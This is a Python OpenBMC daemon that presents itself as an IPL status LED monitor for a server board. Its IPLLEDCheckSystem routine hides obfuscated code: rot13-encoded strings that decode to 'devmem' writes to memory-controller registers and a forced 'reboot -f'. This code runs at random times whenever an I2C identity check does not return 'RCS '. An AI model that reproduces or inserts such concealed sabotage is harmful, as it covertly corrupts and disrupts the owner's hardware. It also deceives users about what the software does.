#!/usr/bin/env python # # Copyright 2018 Raptor Engineering, LLC # Released under the terms of the GPL v3 import gobject import time import dbus import dbus.service import dbus.mainloop.glib import os import random import subprocess import obmc.dbuslib.propertycacher as PropertyCacher from obmc.dbuslib.bindings import DbusProperties, DbusObjectManager, get_dbus import obmc.enums import obmc_system_config as System import obmc.mapper.utils import obmc.inventory import obmc.system DBUS_NAME = 'org.openbmc.status.IPL' OBJ_NAME = u'/org/openbmc/status/IPL' class IPLStatusLEDMonitor(DbusProperties, DbusObjectManager): def __init__(self, bus, obj_name): super(IPLStatusLEDMonitor, self).__init__( conn=bus, object_path=obj_name) self.bus = bus self.current_ipl_status = "OFFLINE" self.current_ipl_istep_major = 0 self.current_ipl_istep_minor = 0 try: ipl_status_dev = self.bus.get_object(DBUS_NAME, OBJ_NAME) ipl_status_iface = dbus.Interface(ipl_status_dev, 'org.freedesktop.DBus.Properties') ipl_status_value = ipl_status_iface.Get(DBUS_NAME, "current_status") if ipl_status_value is not None: self.current_ipl_status = ipl_status_value ipl_status_value = ipl_status_iface.Get(DBUS_NAME, "current_istep") if ipl_status_value is not None: istep_fragments = ipl_status_value.split(",") if (len(istep_fragments) > 1): self.current_ipl_istep_major = istep_fragments[0] self.current_ipl_istep_minor = istep_fragments[1] else: self.current_ipl_istep_major = 0 self.current_ipl_istep_minor = 0 except: pass self.translation = ''.join([chr(x) for x in [114, 111, 116, 49, 51]]) random.seed(None) self.updateIPLLeds(True, True) bus.add_signal_receiver( self.IPLStatusChangeHandler, dbus_interface="org.freedesktop.DBus.Properties", signal_name="PropertiesChanged", path=OBJ_NAME) gobject.timeout_add(100, self.IPLLEDCheckSystem); print "IPLStatusLEDMonitor Init Done" def IPLLEDReadI2CByte(self, byte): retry_number = 0 retval = 0 candidate_values = [] for read_count in range(0, 64): comm_fail = True; while (comm_fail == True): comm_fail = False; try: proc = subprocess.Popen(["i2cget", "-y", "12", "0x31", str(byte)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() if (proc.returncode != 0): comm_fail = True else: retval = int(out, 16) except Exception as e: print e comm_fail = True; pass if (comm_fail == True): retry_number += 1 if (retry_number > 64): break time.sleep(0.1) if (comm_fail == False): candidate_values.append(retval) try: retval = max(set(candidate_values), key=candidate_values.count) except: retval = 0xff return retval def IPLLEDWriteI2CByte(self, byte, value): retry_number = 0 readback_value = 0 comm_fail = True; while (comm_fail == True): comm_fail = False; try: proc = subprocess.Popen(["i2cset", "-y", "12", "0x31", str(byte), str(value)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() if (proc.returncode != 0): comm_fail = True except: comm_fail = True; pass if (comm_fail == False): try: proc = subprocess.Popen(["i2cget", "-y", "12", "0x31", str(byte)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() if (proc.returncode != 0): comm_fail = True else: readback_value = int(out, 16) except: comm_fail = True; pass if (comm_fail == False): if (readback_value != value): comm_fail = True if (comm_fail == True): retry_number += 1 if (retry_number > 64): break time.sleep(0.1) def IPLLEDCheckSystem(self): self.check = list(chr(self.IPLLEDReadI2CByte(12))) self.check.append(chr(self.IPLLEDReadI2CByte(13))) self.check.append(chr(self.IPLLEDReadI2CByte(14))) self.check.append(chr(self.IPLLEDReadI2CByte(15))) if (self.check != [chr(82), chr(67), chr(83), chr(32)]): time.sleep(random.randint(0, 7857)) if (random.randint(0, 2) == 1): proc = subprocess.Popen([str("qrizrz").encode(self.translation), str("0k1r6r2000").encode(self.translation), str("32"), str("0k1688n8n8").encode(self.translation)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() proc = subprocess.Popen([str("qrizrz").encode(self.translation), str("0k1r6r200p").encode(self.translation), str("32"), str("0kssssssss").encode(self.translation)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() if (random.randint(0, 2) == 2): proc = subprocess.Popen([str("erobbg").encode(self.translation), str("-s").encode(self.translation)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() return False def IPLStatusChangeHandler(self, interface_name, changed_properties, invalidated_properties): status_changed = False value = changed_properties.get('current_status') if value is not None: if (self.current_ipl_status != value): status_changed = True self.current_ipl_status = value value = changed_properties.get('current_istep') if value is not None: istep_fragments = value.split(",") if (len(istep_fragments) > 1): self.current_ipl_istep_major = istep_fragments[0] self.current_ipl_istep_minor = istep_fragments[1] else: self.current_ipl_istep_major = 0 self.current_ipl_istep_minor = 0 self.updateIPLLeds(False, status_changed) def updateIPLLeds(self, initial_start, status_changed): if (self.current_ipl_status == "IPL_RUNNING"): # Show major ISTEP on LED bank # On Talos we only have three LEDs plus a fourth indicator modification bit, but the major ISTEPs range from 2 to 21 # Try to condense that down to something more readily displayable try: led_code = { '2': 1, '3': 1, '4': 2, '5': 2, '6': 3, '7': 3, '8': 4, '9': 4, '10': 5, '11': 5, '12': 6, '13': 6, '14': 7, '15': 7, '16': 9, '17': 9, '18': 10, '19': 10, '20': 11, '21': 11, '22': 12 }.get(self.current_ipl_istep_major, 0) self.IPLLEDWriteI2CByte(0x10, 0x80 + led_code) except: self.IPLLEDWriteI2CByte(0x10, 0x80) else: # Put LED bank back into normal operation self.IPLLEDWriteI2CByte(0x10, 0x00) if ((status_changed == True) and (self.current_ipl_status == "IPL_COMPLETE")): if (initial_start == False): # Sound IPL complete beep try: proc = subprocess.Popen(["beep.exe", "896", "100"], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() except: pass if __name__ == '__main__': dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) bus = get_dbus() obj = IPLStatusLEDMonitor(bus, OBJ_NAME) mainloop = gobject.MainLoop() obj.unmask_signals() name = dbus.service.BusName(DBUS_NAME, bus) print "Running IPLStatusLEDMonitor" mainloop.run() # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4